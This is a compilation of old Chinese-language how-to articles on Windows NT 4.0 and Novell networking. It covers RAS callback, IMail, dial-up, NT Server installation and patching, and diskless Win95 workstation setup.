这时，不用在SERVER端设置固定的用户电话号码。当在用户拨入时，RAS服务器经过验证用户成功时，这时SERVER自动弹出一个对话框，让用户填写所要回拨的电话号码。然后，SERVER自动断开拨号，将回拨到用户所给的电话号码，进行网络连接。

返回


设置Email成为一个可用的mail server

《一键清理系统垃圾》

设置Email成为一个可用的mail server

首先：安装imail，选择用户数据库可以选择NT系统的或者imail的，两者的不同点是：NT系统数据库的用户账号和系统账号是一致的，而imail的用户数据库跟系统没有关系的。建议使用imail数据库，免的管理这么多的NT用户，对系统的安全威胁也要小一些。安装的时候，还会提示使用的域名，输入合法的域名，比如chinaasp.com，就是以后用来收发邮件的主机地址了。
其次：imail的配置。如果按照上述安装完毕，其实已经完成了大部分。打开imail administrator（开始菜单里面），可以看到自己创建的主机，例子为chinaasp.com。然后下面有users，右键单击，选择add user，可以添加用户。
    比如添加了一个用户叫做kindong，那么信箱就是kindong@chinaasp.com了。对于该用户可以设置一些参数，比如信箱大小之类的，都可以使用imail administrator设置。这是最基本的。
另外：配置smtp。需要给imail系统提供域名解析服务器，用户对internet上的email地址进行解析。对于imail5.0，在控制面板里面有一个imail server，对于imail6.0，可以直接使用imail administrator（单击localhost，右面就会显示系统设置）。在系统配置窗口有许多标题，选择smtp，在Domain Name Server Address下面的文本框里面输入一个isp的dns地址，比如上海的202.96.209.5，可以解析任何一个internet合法地址的。这样基本上就完成了smtp的设置。
    剩下的任务：配置dns，将域名作解析，可以参阅http://www.chinaasp.com/sqlbbs/showEssence.asp?id=4807

返回


一些MS常用的缩写词

《一键清理系统垃圾》

一些MS常用的缩写词

中文意思是翻译的可能不准确，这些词好些都有其它意思，我列出的基本上只是MS定义的，如IDE、PDC等
ID,缩写词,全称,中文意义
1,ACE,access-control entry,存取控制条目
2,ACL,access control list,存取控制列表
3,ADO,Active Data Objects,活动数据对象
4,ADSI,Active Directory Service Interfaces,活动目录服务接口
5,ASP,Active Server Page,活动服务页
6,ASPs,Active Server Page Script,活动服务页脚本
7,CDO,Collaboration Data Objects,协作数据对象
8,COM,Component Object Model,组件对象模型
9,COM+,Expanding and extending services, building on COM and MTS,基于COM和MTS的扩展服务
10,DAO,Data Access Objects,数据存取对象
11,DAV,Distributed Authoring and Versioning,分布式编译
12,DCOM,Distributed Component Object Model,分布组件对象模型
13,DDL,Data Definition Language,数据定义语言
14,DHTML,dynamic HTML,动态HTML
15,DML,Data Manipulation Language,数据操纵语言
16,DNS,Digital Nervous System,数字神经系统
17,DNA,Distributed interNet Applications,分布式网络应用
18,DOM,DTS Object Model, Document Object Model,DTS对象模型，文档对象模型
19,DSO,Decision Support Objects,决策支持对象
20,DTC,Design-Time Controls,设计时间控件
21,DTS,Data Transformation Services,数据转换服务
22,FPSE,FrontPage Server Extensions,FrontPage服务器扩展
23,IDC,Internet Database Connector,Internet 数据库连接程序
24,IDE,Integrated Development Environment,集成开发环境
25,IIS,Internet Information Server,Internet信息服务器
26,IMDB,In-Memory DataBase,内存数据库
27,ISAPI,Internet Server API,Internet 服务器应用程序编程接口
28,MAPI,Messaging Application Programming Interface,消息应用程序编程接口
29,MDAC,Microsoft Data Access Components,Microsoft数据存取组件
30,MMC,Microsoft Management Console,Microsoft 管理控制台
31,MSDE,Microsoft Data Engine,Microsoft数据引擎
32,MSDN,Microsoft Developer Network,Microsoft开发者网络
33,MSN,Microsoft Network,Microsoft网络
34,MSMQ,Microsoft Messaging Queue,Microsoft消息队列
35,MTF,Microsoft Tape Format,Microsoft磁带格式
36,MTS,Microsoft Transaction Server,Microsoft事务服务器
37,ODE,Office Developer Edition,Office 开发人员版本
38,ODS,Open Data Services,开放数据服务
39,OLAP,Online Analytical Processing,在线分析处理
40,ORB,Object Request Broker,
41,OWA,Outlook Web Access,Outlook Web存取
42,PDC,Professional Developers Conference,专业开发人员大会
43,PTS,PivotTable Service,数据透视表服务
44,RDO,Remote Data Objects,远程数据对象
45,RDS,Remote Data Service,远程数据服务
46,SGML,Standard Generalized Markup Language,标准通用标记语言
47,SQL-DMF,SQL Distributed Management Framework,SQL分布式管理结构
48,SQL-DMO,SQL-Distributed Management Objects,SQL分布式管理对象
49,SQL-NS,SQL-Namespace Objects,SQL命名空间对象
50,VBA,Microsoft Visual Basic for Applications,
51,VBScript,Microsoft Visual Basic Scripting Edition,
52,WSH,Windows Scripting Host,
53,XML,eXtensible Markup Language,可扩展标记语言
54,ZAW,Zero-admin Windows,零管理WINDOWS

返回


在NT SERVER如何配置拨号上网

《一键清理系统垃圾》

在NT SERVER如何配置拨号上网

1）将调制解调器安装好。
2）在控制面板里，双击调制解调器，选择添加，这时自动检测COM端口。如果调制解调器存在，将被自动识别。如有驱动程序，将其驱动程序安装好。若没有，请选择标准调制解调器。
3）在“我的电脑”里，双击拨号网络，这时程序将自动配置服务，其服务是远程访问服务。
4）在安装远程访问服务里，在配置里有（1）只能拨出（2）只能接收 （3）拨出和接收，请选择第（3）项，拨出和接收。然后，点继续。

这时你的拨号网络服务已经配置好了。
双击拨号网络，新建电话薄里添入名字和拨号的电话号码。
选择其他选项，点击编辑项和调制解调器属性。一般在语系里，默认的选择是拨号后（登录）无，请改为弹出一个终端窗口。就可以进行拨号了。

如果，想要自动拨号，请您选择其他选项，点击编辑项和调制解调器属性。在语系里，选择拨号后（登录）无，在安全里选择接受任何验证（包括明文）然后，点击未保存密码。

这时，您拨号时请输入用户名和密码，并且选择保存密码。
您就可以自动拨号了。

返回


在NT下实现拨号上网

《一键清理系统垃圾》

在NT下实现拨号上网

    大家对于Windows 95／98的拨号上网设置可能已经非常熟悉了，但许多朋友一到了Windows NT下便不知如何是好———NT虽然与Win 98貌似，却又真的“与众不同”。其实只要掌握最关键的几个差别之处的设置，NT的拨号网络也是极易上手的。好吧，跟我来！
    一、准备工作

    1．打开“控制面板→网络→服务”，检查有没有安装“远程访问服务（RAS）”。如果没有安装，则在“添加”中添加该服务。

    2．单击“远程访问服务→属性”，在“添加”中选择“安装调制解调器”来添加调制解调器，过程与Win 98完全一样。

    3．单击“远程访问服务→配置”，选中“只能拨出”。

    4．单击“远程访问服务→网络”，在“拨出协议”中，选择“TCP／IP”协议。

    二、实战

    1．安装好Modem后，打开“我的电脑→拨号网络”，使用新建创建一个电话薄项。

    2．单击“拨号网络→其它→编辑项和调制解调器属性→服务器”，选中“PPP”服务器类型，选中“TCP／IP”选项，单击“TCP／IP设置”，填入拨号上网需要的DNS。“安全”子页的选择为：

    （1）“接受任何验证（包括明文）”；

    （2）“仅接受密码认证”；

    （3）“仅接受Microsoft密码认证”。

    如果是163用户，请选择（1）因为拨入服务器是Unix主机；如果是169用户，请选择（2）因为拨入服务器是Win NT主机（这一条是最关键又是最易出错的地方！）其它子页使用默认设置即可。

    3．单击“拨号网络→其它→用户首选项→回拨”，选中“否，忽略回拨”。其它子页使用默认设置。

    做好上面三项工作，您就可以伴着Modem呼啸声的前奏，遨游在Internet的海洋中了！

返回


中小企业INTERNET 建站指南 --- NT 的安装

《一键清理系统垃圾》

中小企业INTERNET 建站指南 --- NT 的安装

一、现在开始安装
1、 安装前的准备
1、域名的申请
你需要申请一个域名和一个全球唯一的Internet IP地址，IP地址是你的ISP给你的
国际域名的申请：
直接向国际互联网络信息管理中心(INTERNIC http://www.internic.net ）注册贵公司所需顶级域名(.com或 .org或.net，新增7个顶级域名：.arts, .firm,.info,.nom,.ree,.shop,.web）
国内域名的申请：
在中国互联网络管理中心(CNNIC http://www.cnnic.com.cn )贵公司所需二级域名(.com.cn或.org.cn或.net.cn或 gov.cn)。申请时需注意填写域名服务器（DNS SERVER）的主域名服务器的IP地址是自己的IP地址，如：203.93.168.130

2、如果你的服务器已安装好，你可不用看这些。我把硬盘分成C：、D：两个分区。C：FAT格式，4.3G，MS-DOS主分区,已装MS-DOS, D：FAT格式，4.3G，光驱盘符为E：。（用WINDOWS 98 的启动盘进行分区）在MS-DOS环境，进入光盘Windows NT Server 4.0中文版的安装主目录I386，键入WINNT/B回车，出现MS-DOS字符方式部分的安装界面。在确认安装文件所在路径后回车，即开始从安装光盘拷贝文件到硬盘的临时安装目录，并显示拷贝完成百分比和温度计式拷贝进度图示。文件拷贝完毕，屏幕提示基于MS-DOS部分的安装已经完成，并告知需要重新启动计算机以继续安装过程。按下回车键返回命令提示符状态，然后重新启动计算机。

2、基本系统安装

重新启动计算机，启动过程已被Windows NT的操作系统管理器OS Loader 4.0 所控制。OS Loader自动选择“Windows NT 4.0 Installation/Upgrade"项目，继续进行后续安装工作。检测硬件配置、装载安装文件后，显示Windows NT 4.0 的版本信息。稍后，显示Windows NT Server安装程序界面。根据屏幕提示，选择“开始安装Windows NT，请按ENTER。”一项。按下回车键继续，屏幕显示Windows NT 许可协议内容，按 PAGE DOWN 键向后翻页，直至屏幕底行显示“F8=我同意，ESC=我不同意”，此时按下F8键接受许可协议，安装过程继续。屏幕显示安装程序检测到的本机硬件大致情况，根据提示在“上述列表与我的计算机相符”项上按下回车键继续，安装程序显示当前磁盘分区情况、分区文件系统格式（FAT、NTFS）、自由磁盘空间，并提示选择将要安装Windows NT的分区。本例选择FAT格式的C：安装Windows NT操作系统。将光带移动到C：上回车，安装程序又提示选择该分区的文件类型，此时选择“保持现有文件系统（无变化）”回车（不用NTFS文件系统格式，主要考虑兼容MS-DOS便于文件相互存取和管理或你也可采用NTFS这种更好的格式），安装程序提示输入Windows NT 安装目录，保持“\WINNT"不变直接回车，安装程序提示选择是否检测硬盘，按回车键进行检测或按ESC键跳过硬盘检测之后，安装程序开始复制Windows NT基本系统文件到C:\WINNT目录，复制完成后，提示取出A：驱动器的软盘和CD-ROM中的CD，按回车键启动计算机。

3、网络向导安装

再次启动计算机后，OS Loader 显示“Windows NT Server Version 4.00"、 "Windows NT Server Version 4.00 [VGA Mode]"和“Microsoft DOS6.22"三项启动选择，默认“Windows NT Server Version 4.00"项并等待改变选择项（30秒读秒）。正常启动Windows NT，应选择第一项；当Windows NT发生启动故障时选择第二项；如欲启动原有MS-DOS操作系统则选择第三项。现在选择第一项，屏幕显示“NTDETECT V4.0 正在检测硬件…”，稍后显示Windows NT 版本，然后出现Windows NT 图形安装界面，继续复制Windows NT系统安装向导文件。稍后，Windows NT安装向导开始运行，并将分“1）收集有关计算机信息”、“2）安装Windows NT网络”、“3）完成安装”三部分进行“上一步”、“下一步”的向导式分步安装。

输入名称、组织，单击“下一步”，输入10位注册CD码，选择“每服务器有X个同时连接”的许可协议方式，并单击“下一步”，安装向导提示输入计算机名称。本例输入LITESTARNT(自动大写），单击“下一步”，提示选择服务器类型，在“主域控制器”、“备份域控制器”、“独立的服务器”三种类型中，选择“主域控制器”并单击“下一步”，安装向导提示输入并确认管理员帐号密码，在“密码”和“确认密码”输入栏输入相同的管理员密码（一定要谨记密码并保证密码的保密性，以后要时常用到。），单击“下一步”。安装向导提示选择是否创建紧急修复磁盘，为保证Windows NT系统的安全，选择“是，创建一张紧急修复盘”并单击“下一步”，安装向导显示Windows NT安装组件选取界面，可逐项选取或直接单击“下一步”选取默认组件，在接下来的两个选择界面下分别勾选“用线路连接到网络”、“安装Microsoft Internet Information Server"并单击“下一步”，安装向导显示网络适配器选择界面，点选“从列表中选择”，并从弹出的网络适配器选择窗口中选取两个网卡进行安装，单击“确定”，再单击“下一步”，在下一个网络协议选择窗口勾选“TCP/IP协议”、“NetBEUI通讯协议”、 “PPP(即点对点)通讯协议”，然后单击“下一步”。在接下来的服务安装选择窗口中，除已有的服务外，点取“从列表中选择”，然后在弹出的选定网络服务窗口分多次选取“Microsoft DNS服务器”和“远程访问服务”，“WINDOWS网际名称服务”、“RIP FOR INTERNET PROTOCOL”然后单击“下一步”。在接着的安装网卡和安装TCP/IP窗口中，分别取默认值，然后在安装远程访问窗口单击“是”按钮进行调制解调器的检测、安装，根据所配置的调制解调器型号作出选取之后单击“下一步”，输入位置信息窗口中的电话区号、线路种类（音频、脉冲），点“完成”以结束调制解调器的安装。在后面的添加RAS设备、安装远程访问RAS服务器、NetBEUI配置、RAS服务器TCP/IP配置、RAS服务器IPX配置、NWLink IPX/SPX、NWLink IPX/SPX属性窗口依次选取“确定”、“继续”、“确定”、“确定”、“是”、“确定”，安装向导显示Microsoft TCP/IP属性设置窗口，在IP地址选项卡下点取“指定IP地址”，并输入为本服务器指定的IP地址，例如：203.93.137.72，点“确定”。接下来，在绑定信息窗口和启动网络窗口单击“下一步”，然后在主域控制器域名输入窗口去掉默认的域名“DOMAIN"，输入指定的域名，如“COM"，单击“下一步”。一段时间后，显示Windows NT 安装完成窗口，单击“完成”，即完成了Windows NT网络部分的安装。

4、IIS安装

由于在前面的安装过程中已选定安装Microsoft Internet Information Server（IIS），因而自动开始Microsoft Internet Information Server 2.0的安装。Windows NT的IIS包括WWW、FTP、Gopher三项基本Internet服务。本部分的安装比较简单，在选项窗口点选安装全部选项之后，其余全部取默认项即可。

5、完成安装

以上全部安装完毕后，显示日期/时间属性窗口进行时区选择，此处选择“（GMT+08：00）北京，重庆，乌鲁木齐”，单击“关闭”，然后进行显示适配器的设置，设置后单击“确定”，开始复制有关系统文件到D:\WINNT目录中，并保存系统配置。然后，提示插入一张磁盘到A：驱动器，单击确定进行创建紧急修复磁盘。之后，自动删除硬盘上的临时安装文件，显示Windows NT 4.0已经成功安装，取出A：驱动器中磁盘，单击“重新启动计算机”，整个安装过程结束。

返回


中小企业INTERNET 建站指南 --- 给WINDOWS NT SERVER 4.0补补

《一键清理系统垃圾》

中小企业INTERNET 建站指南 --- 给WINDOWS NT SERVER 4.0补补

    我们的服务器已经可以运行了，工作已完成了一半，但不是很好，要让它很好的运行，还需装些MICROSOFT 新出的SERVER PACK (打补丁) :
1、 Windows NT Server Pack 3是Windows NT 4.0的升级服务包，除了修正原有错误，还包括Windows NT Server 4.0发布之后的新技术支持，因而这部分的安装几乎是必须的。
在以管理员身份登录后，在WinNT资源管理器中双击执行SP3的安装文件Nt4sp3_i.exe，即开始SP3的安装。首先提取文件到临时目录C:\TEMP中，然后进入安装向导界面。按照提示，每一步都取默认值，然后开始复制SP3升级文件到C:\WINNT目录，最后显示WinNT已经被更新。选择“确定”来重新启动计算机，会看到操作系统管理器OS Loader的版本已经由4.0变为4.01，原来的WinNT版本号“Build 1381 Server Pack 1"变为“Build 1381 Server Pack 3"。此部分安装结束。

用安装步骤1的安装方法再安装 IE 4.01 SP1、 OPTION PACK4 (IIS 4和ACTIVE SERVER PAGES 2.0)和Windows NT Server Pack 4，请注意安装顺序。每安装完一个必须重新启动计算机,安装完这些后你的NT SERVER 就运行得很好并很安全了,另外你可在控制面板、服务中将一些常用的程序设置为自动启动，如：DNS SERVER 等。这样每次启动计算机时，就将所需要的服务全部启动了。

返回


中小企业INTERNET 建站指南 ---安装后的设置

《一键清理系统垃圾》

返回总目录 上一页 目录页

中小企业INTERNET 建站指南 ---安装后的设置

三、安装后的设置
Windows NT Server 4.0 全部安装完毕之后，启动计算机，在OS Loader处选择“Windows NT Server Version 4.0"，即开始Windows NT的启动。稍后，显示Windows NT登录提示窗口。按照提示按下Ctrl+Alt+Del进行登录，Windows NT显示登录信息画面，确认用户名为管理员（Administrator），在密码输入域输入管理员密码（安装时建立的密码）回车，即可登录到Windows NT桌面，进行下一步的设置工作了。

1、远程访问配置

顺序选取“控制面板”-"网络”-"服务”-"远程访问服务”-"属性”，窗口如图1。点取“配置”，在“配置端口用法”窗口中将“端口用法”点选为“拨出和接收”，单击“确定”；再在图1画面点取“网络”，窗口如图2。在“允许远程客户运行”的三种协议中只保留“TCP/IP"一项的勾选，并点取TCP/IP后面的“配置”，点选“使用静态地址集”，在“起始”IP地址栏输入203.93.137.0, 在“结束”IP地址栏输入203.93.255.255,然后单击“确定”、“确定”，在图1选“继续”完成设置。

2、添加IP地址也是最主要的

顺序选取“控制面板”-"网络”-"协议”-"TCP/IP通讯协议”-"属性”，IP地址栏，适配器依次选取所安装的网卡,先选取PCI的作为对内部使用，选指定IP地址，你可随便填只要不和INTERNET 上的有冲突就行，如：IP地址203.93.137.73 子网掩码 255.255.255.0默认网关 203.93.168.130 ,再选ISA 的作为对外(INTERNET)使用的,IP地址是你的ISP指定的,比如我的：IP地址203.93.168.130 子网掩码 255.255.255.0默认网关 203.93.168.129。如你还有更多的INTERNET IP需加入，再点下面的高级，在适配器中选出对外的网卡（一定要记住喔）如我的ISA网卡，在IP地址栏依次点取“添加”，进去就可,默认你都能看到一个 ,逐个IP地址添加完毕后，单击“确定”返回；再点击“DNS"栏，主机名你自己填，如123 域中填入“COM”在“DNS服务器搜索顺序”处单击“添加”，然后输入主机对外网卡的IP地址203.93.168.130和ISP给你的DNS IP 如：203.93.104.1,但主机对外网卡的IP地址203.93.168.130一定要在前面,再单击“确定”，再点击“WINS地址” 选项卡，在“主WINS服务器”处输入两个网卡各自的IP地址就可，然后单击“确定”，再单击“关闭”退出网络属性窗口，重新启动计算机。

返回


Windows NT

《一键清理系统垃圾》

返回总目录

Windows NT

◎IIS组建Intranet完全手册
◎Intranet接入Internet的技术要点
◎MS Windows NT操作平台：与UNIX的企业互操作性(M$)
◎NT4.0无盘工作站用户管理
◎NT4.0组网技术系列讲座(一)
◎NT4.0组网技术系列讲座(一)
◎NT4.0组网技术系列讲座(二)
◎NT4.0组网技术系列讲座(三)
◎NT4.0组网技术系列讲座(四)
◎NT4.0组网技术系列讲座(五)
◎NT4.0组网技术系列讲座(一)
◎NT Server 4.0 做静态路由器
◎NT SERVER 如何做镜像
◎NT Server的AT命令详解
◎NT Server用作 Internet的网关
◎NT磁盘镜像中断后的恢复
◎NT使用中的若干常识
◎NT网的无盘工作站远程登陆
◎NT网络配置不当引起网络安全一例
◎NT网上电子邮件系统的建立（二）
◎NT网上电子邮件系统的建立
◎NT无盘win95安装问题精解
◎NT无盘win95的调试和后期工作
◎Windows 95工作站如何登录到Windows NT网络
◎Windows NT4 磁盘分区对策
◎Windows NT4.0网络中漫游用户配置文件的建立
◎Windows NT4.0下建立PWin95无盘工作站的注意事项
◎Windows NT 4.0下无盘工作站的建立
◎Windows NT Server——支持Windows 95的最佳网络平台
◎Windows NT安全性理论与实践
◎Windows NT常见问题解答
◎Windows NT的安全机制浅析
◎Windows NT服务器及工作站的安装
◎Windows NT服务器用作路由器
◎Windows NT环境下的系统容错技术
◎Windows NT卷集和带区集的建立及应用
◎Windows NT网络的资源共享
◎Windows NT网络服务器的ASP危机
◎Windows NT系统崩溃时可借鉴的工具
◎WinNT中安装内置MODEM
◎安装NT Server服务器
◎安装电子邮件服务Exchange Server 5.5
◎拨号 Internet 邮件服务主机配置
◎不可不会的NT注册表修改技巧
◎测试网络连接
◎关于 磁盘管理器
◎基于 TCP/IP 的动态 RAS 连接器
◎建立因特网上的邮件服务器
◎局域网安装软硬件要求及有关假设
◎快速安装中文Windows NT 4.0下的DOS工作站
◎利用Exchange建立Internet电子信箱
◎利用Microsoft Mail邮建立简易电子邮件系统
◎利用NT 4．0实现VPN
◎利用WINDOWS NT设置软件路由
◎连接网络(硬件)
◎让Windows NT的服务程序按时作息
◎如何使用RAS远程回拨
◎如何在Win95/98/NT上调试CGI程序
◎设置Email成为一个可用的mail server
◎为NT安装Lan Manager V2.0 DOS工作站
◎一些MS常用的缩写词
◎在NT SERVER如何配置拨号上网
◎在NT下实现拨号上网
◎中小企业INTERNET 建站指南 --- NT 的安装
◎中小企业INTERNET 建站指南 --- 给WINDOWS NT SERVER 4.0补补
◎中小企业INTERNET 建站指南 ---安装后的设置

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


Novell 4.11无盘Win95/98安装捷径

《一键清理系统垃圾》

返回总目录 目录页 下一页

Novell 4.11无盘Win95/98安装捷径

思路
    1.在生成Win95版本的netSdos.sys(简称net.w95)之前，和该文件大小为0字节时，巧妙调整修改Win95远程启动(rpl)安装相关文件的配置及操作：删除、拷贝等，生成可引导至Win95/DOS状态的net.w95文件。
    2.修改用户注册文件，把Win95整个系统当作一个简单的软件来安装和使用。

    要求

    1.服务器(jxsx－server)和工作站为586/100以上兼容机，16M或32M RAM，网卡PCI或NE2000(本文以PCI为例)。2.Novell版本4.11或以上，工作站3～4台，至少有一台已安装Win95及相关客户软件，即＊.vlm,net.cfg,vlm.exe等。

    一、Win95版本net.w95文件巧妙生成

    1.运行netsetup.exe完成服务器共享的安装设为：jxsx－sever\sys\sbs
    2.修改msbatch.inf文件
    [setup]
    installtype=3
    uninstall=0
    display=1
    [network setup]
    hdboot=0
    rplsetup=1
    network station setup=1
    display network setup=1
    ;installdir=″jxsx\sys\winuser″
    display=1
    3.在无盘工作站1号机上，在DOS 622方式下以admin注册运行
    map f:=sys:\sbs
    f:
    setup /t:f:\temp
    根据安装向导，选择“远程无盘启动方式运行Windows”；
    设置机器(用户)目录f:\winuser(sys为系统卷)
    4.从装有Win95的工作站2号机，以DOS 6.22无盘方式启动至网络(admin注册)，转到f:\winuser目录，观察该目录下当产生config.win文件时暂停1号机的“下一步”安装，编辑config.win文件内容为：
    device=himem.sys
    device=emm386.exe ram
    device=ramdrive.sys 1440/A
    dos=high,umb
    files=64
    lastdrive=z
    同时将sbs下的himem.sys,emm386.exe,ramdrive.sys拷贝至该目录和suboot目录下(emm386.exe文件一定不能少)。
    5.在1号机上继续安装，挂起所有硬件检测，网络安装时只要网卡设置、驱动程序添加正确，其它如协议等概可不管，也无须改动删除等。直到“复制完所有文件”后暂停，切勿选择“完成安装”，这时的suboot目录下有重大“秘密”。
    6.到2号机上的f:\winuser下，这时发现netSdos.sys大小为0字节，说明suboot下的文件尚未打包——即为“秘密”，进入suboot修改：
    1Autoexec.bat文件
        lh lsl
        lh pciodi
        lh ipxodi
        copy a:\command.com c:\
        copy ＊.vlm c:\
        copy vlm.exe c:\
        set comspec=c:\command.com
        c:
        vlm.exe
        f:
        login user
    2删除net.win、net.bak、net.cfg，并且将2号机硬盘c:\net下的pciodi.com、＊.vlm、vlm.exe、net.cfg、lsl.com、ipxodi.com文件拷贝到suboot下，同时复制net.cfg文件为net.bak和net.win。
    7.在1号机上选择“完成安装”，几秒钟后在2号机上运行dir.sys可看到netdos.sys由0变为1.2M左右，说明系统根据suboot下的config.sys、Autoexec.bat的设置将该目录下的所有文件打包到netSdos.sys(即为net.w95)中去了，这时将netSdos.sys、autoexec.bat拷贝至f:\login下，便可无盘引导至Win95/DOS状态了，至此Win95版本的远程自举net.w95文件顺利生成。

    二、把Win95整个系统当作一个简单的软件来安装

    1.在2号机上以无盘进入网络(admin注册)，进入c:\windows，运行subst a: c:\windows——将a:虚拟成为c:\windows目录(一定要做)，运行a:>win.com，打开“我的电脑”图标，在f:\建立winbak文件夹，将c:\windows及其子目录下的所有文件和c:\根目录下的所有＊.bat、＊.sys等改为正常属性进入dos－prompt方式。
    xcopy c:\＊.＊ f:\winbak\ /s/e
attrib c:\＊.＊ ＋s,＋h,＋r
;以免Win95单机不能运行。
attrib f:\winbak\＊.＊ ＋r,＋s,＋h
flag f:\winbak\＊.＊ sh di /s
；设置共享，禁止删除属性。
    2.修改user用户注册文件login script为：
    map display on
    map f:=sys:\
    map s16:=sys:\winbak\windows\
    map s16:=sys:pubcic
    map s16:=f:login
    map root c:=sys:\winbak
    map root a:=sys:\winbak\windows
    comspec=c:\command.com
    3.在f:\login下编辑win.bat:
    login user
    c:
    win.com
    重新启动所有工作站无盘进入网络便大功告成!
    特点：本方法为万能方法，可永久删除共享安装目录(sbs)，减少了繁琐的machines.ini文件的编辑过程；其它软件(如：显卡驱动，声卡驱动等)可在网络上顺利安装——就像在硬盘上一样。

返回


Novell无盘Windows95

《一键清理系统垃圾》

Novell无盘Windows95

安装设置环境

    服务器名：DONG
    安装卷名：SYS
    安装共享目录：G:\WIN95
    安装WINDOWS95目录:G:\USER\USER1\WINDOWS(G为SYS卷的根目录)
    G:\USER\USER2\WINDOWS
    1、需要软件：NOVELL3.12、全版windows95
    2、安装步骤：
    （1）安装novell 服务器，使其支持WINDOWS95长文件名，按常规步骤安装完novell服务器后，在控制台提示符下键入：
    load os2
    add name space os2 to sys(sys是卷名）
    其中LOAD OS2要加入AUTOEXEC。NCF中,add name space os2 to sys
    运行一次即可。
    （2）服务器上windows95共享目录的安装
    在一个有盘windows95工作站上以管理员身份登录到novell网络（如何用windows95登录novell，请参阅其他有关资料），转换到含有全版windows95的光盘中运行admin\nettools\netsetup\netsetup.exe。安装设置如下：
    设置路径：\\dong\sys\win95(\\服务器名\卷名\安装目录）。
    选择服务器安装
    选择不创建默认值
    键入产品序列号
    然后就进行了服务器的安装，复制文件三遍后，再把文件设置为只读属性（安装自行完成）大概要半小时时间，即告服务器安装完毕。
    （3）设置msbatch.inf
    这是安装启动无盘95的最重要的文件之一，安装成功与否就看该文件的设定了。
    在95光盘中运行admin\nettools\netsetup\batch.exe，安装设置如下：（其中未提到的读者可根据提示自行选择）
    network options...设置：
    1、available protocols中选择ipx/spx compatible protocol。
    2、available services中选择file and print sharing for netware networks。
    3、available clients中选择clients for netware networks。preferred serer中键入服务器名（如：dong)
    4、切记选择enable server-bassed setup然后选择remote boot。
    5、选择OK。
    installation options...设置：
    1、在setup options 选项中的type of installation选择custom,installation directory选项中键入安装路径（如:g:\user\user1\windows,切不可填写g:\win95目录）。
    2、time zone和monitor settings选项可自行填写。
    3、set...中选择stop during setup at the following\every page (allow customization of all settings)（防止在安装过程中检测可能出现的错误）。
    4、uninstall中选择don't create uninstall information。
    5、printers中设置可根据实际情况自行选择。
    optional components可设置附件及其他的选项。设置完毕后保存在网络盘符：g:\win95下，并把文件名改为mabatch.inf(该文件已在该目录下存在，首先改掉其只读属性，把其覆盖即可）。
    （4）工作站安装
    在一无盘工作站以管理员身份入网（无盘工作站的设置请参阅其他书籍），在G盘建一临时目录temp，进入g:\win95目录键入setup/t:g:\temp/is/id开始安装。切记加上参数/T和临时目录，不然就会出现“error loading program”的提示信息就退出了，参数/is/id为可选项，其意义可参看setup/?的帮助信息。
    安装过程中的信息其实都是在mabatch.inf文件中的信息，不过在检测硬件时可能会出现检测通不过现象（笔者在安装过程中就出现检测到79%就死机的现象，后来反复实验，原来是检测到端口时死机，让其跳过端口检测就通过了，而在另外一台工作站安装时全部检测都通过了，如果你的机器检测通不过而又不知道是哪种硬件设置原因，就干脆让其跳过硬件检测）。检测过后如有不能识别的设备就帮它设置，最后正式复制文件大概不需要一分钟就搞定了。工作站的设置就算设定了一大半。
    （5）设置machines.ini文件
    这是另外一个重要的文件，它负责提供工作的信息，如果设置不当，照样不能实现无盘启动。该文件实际已存在于g:\win95目录下，用任何文本编辑软件（如EDIT等）打开。内容如下：
    ；windows95 machines.ini
    ;[node address]
    ;sysdatpath=x:\
    ;x=\\server\share
    例子如下：
    [00002100f425]
    sysdatpath=g:\user\user1\windows
    h=\\dong\sys (可省略）
    [00001122cc28]
    sysdatpath=g:\user\user2\windows实际上该文件已经把设置格式都告诉给你了，就按其所述格式设计，其中网卡号可由userlist/a看到或者从服务器monitor中看到。不足12位的在其前加“0”。切记一点，按其格式设定好后，一定要把它的描述文字删除，不然就会在启动过程中出现错误信息然后死机。
    （6）最后设置
    把在g:\user\user1\windows下生成的镜像文件net$dos.sys复制到g:\login目录下，并设置其属性为共享。如果你想实现DOS和WIN95共存，可自行设定BOOTCONF.SYS多重启动文件（具体设置方法可参考novell的有关资料）。第一台工作站设置完毕。
    （7）添加其他工作站
    把g:\win95目录共享，然后在有盘的windows95工作站中按前述步骤设置mabatch.inf文件，使其安装路径改为其他的目录（如g:\user\user2\windows),或直接在g:\win95目录下用文本编辑软件编辑msbatch.inf文件改其安装路径即可，重新安装后编辑machines.ini文件，添加其他的工作站信息，格式如第一个。其他的工作站即添加完毕。
    到此为止，你就算全部完成了在novell网络上启动无盘95的设定。

返回


NT Server无盘站配置技术详解

《一键清理系统垃圾》

NT Server无盘站配置技术详解

    无盘工作站（简称无盘站）即不使用本地磁盘的计算机工作站。由于无盘站具有低配置、低价格、安全性好、易于管理等特点，所以它在我国应用很广。目前，无盘工作站对于学校、网吧、游戏厅和各种计算机培训中心来说是一种较为理想的选择。
    随着客户机/服务器（C/S）结构的兴起，Windows NT网络以其优异的性能、丰富的软件支持已逐步得到广泛的应用。然而，介绍Windows NT无盘站的技术资料很少，给广大网络技术人员建立Windows NT无盘站带来一定困难。在此，笔者愿抛砖引玉，希望与大家共同商榷。

    一、 NT Server服务器的安装

    1. 安装NT Server 4.0中文版
    安装NT Server 4.0中文版，最好使用NTFS文件系统。本文假定NT Server 4.0 装于C:\WINNT目录下，服务器名为NTSERVER，域名为DOMAIN。
    2. 安装NETBEUI协议和DLC协议
    在NT服务器“我的电脑”→“控制面板”→“网络”→“协议”选项中添加NETBEUI协议和DLC协议。
    3. 安装远程启动服务（RPL服务）
    在NT服务器“我的电脑”→“控制面板”→“网络”→“网络服务”列表中选择“远程启动服务”，单击“确定”进行安装。
    4. 启动远程启动服务
    在NT服务器“我的电脑”→“控制面板”→“服务”中选“远程启动服务”，单击“启动”，将启动类型改为“自动”，然后重新启动NT服务器。

    二、RPLCMD命令简介

    NT Server可支持3Com、Intel、Novell NE等系列网卡，对于常见的各种网卡如Accton、D-Link、TOPSTAR及各种NE2000兼容网卡并不能自动识别。这样，就要求用RPLCMD命令手工修改网卡配置文件数据库。
    RPLCMD命令格式为：RPLCMD [\\computername]
    其中，computername为远程启动服务器的计算机名。在程序运行后有下面几个命令：
    A：用于修改不完整的网卡记录。
    B：用于修改BOOK BLOCK 记录，可设置DOSBB.CNF文件路径。
    C：修改配置记录，可用来指出系统目录映射关系文件（DOS622.FIT、DOS622P.FIT、WIN95.FIT、WIN95P.FIT）的路径。
    P：用于修改配置文件。
    S：用于控制远程启动服务。
    V：用于配置网卡厂商编码（网卡ID号的前6位数字）及网卡名称。
